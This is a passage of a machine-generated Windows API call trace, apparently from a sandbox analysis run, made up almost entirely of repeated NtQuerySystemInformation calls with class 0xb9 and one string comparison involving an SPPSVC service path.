(SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0227.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0227.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0227.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0227.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0227.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0227.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x58, ResultLength=0x0) [0227.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x38, ResultLength=0x0) [0227.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecd0, Length=0x28, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x38, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x38, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x28, ResultLength=0x0) [0227.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x28, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x38, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x38, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x38, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x20, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x20, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x20, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x38, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x20, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x20, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x20, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x38, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec40, Length=0x20, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec40, Length=0x20, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1a8, Length=0x50, ResultLength=0x0) [0227.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x28, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef70, Length=0x28, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0227.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x20, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x20, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x20, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feee0, Length=0x20, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feee0, Length=0x20, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff050, Length=0x50, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x38, ResultLength=0x0) [0227.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x28, ResultLength=0x0) [0227.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x28, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x28, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x28, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0227.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x38, ResultLength=0x0) [0227.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x28, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x28, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x38, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee00, Length=0x20, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x20, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x20, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x20, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x38, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee00, Length=0x20, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0227.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.350] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff038, Length=0x50, ResultLength=0x0) [0227.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef60, Length=0x38, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 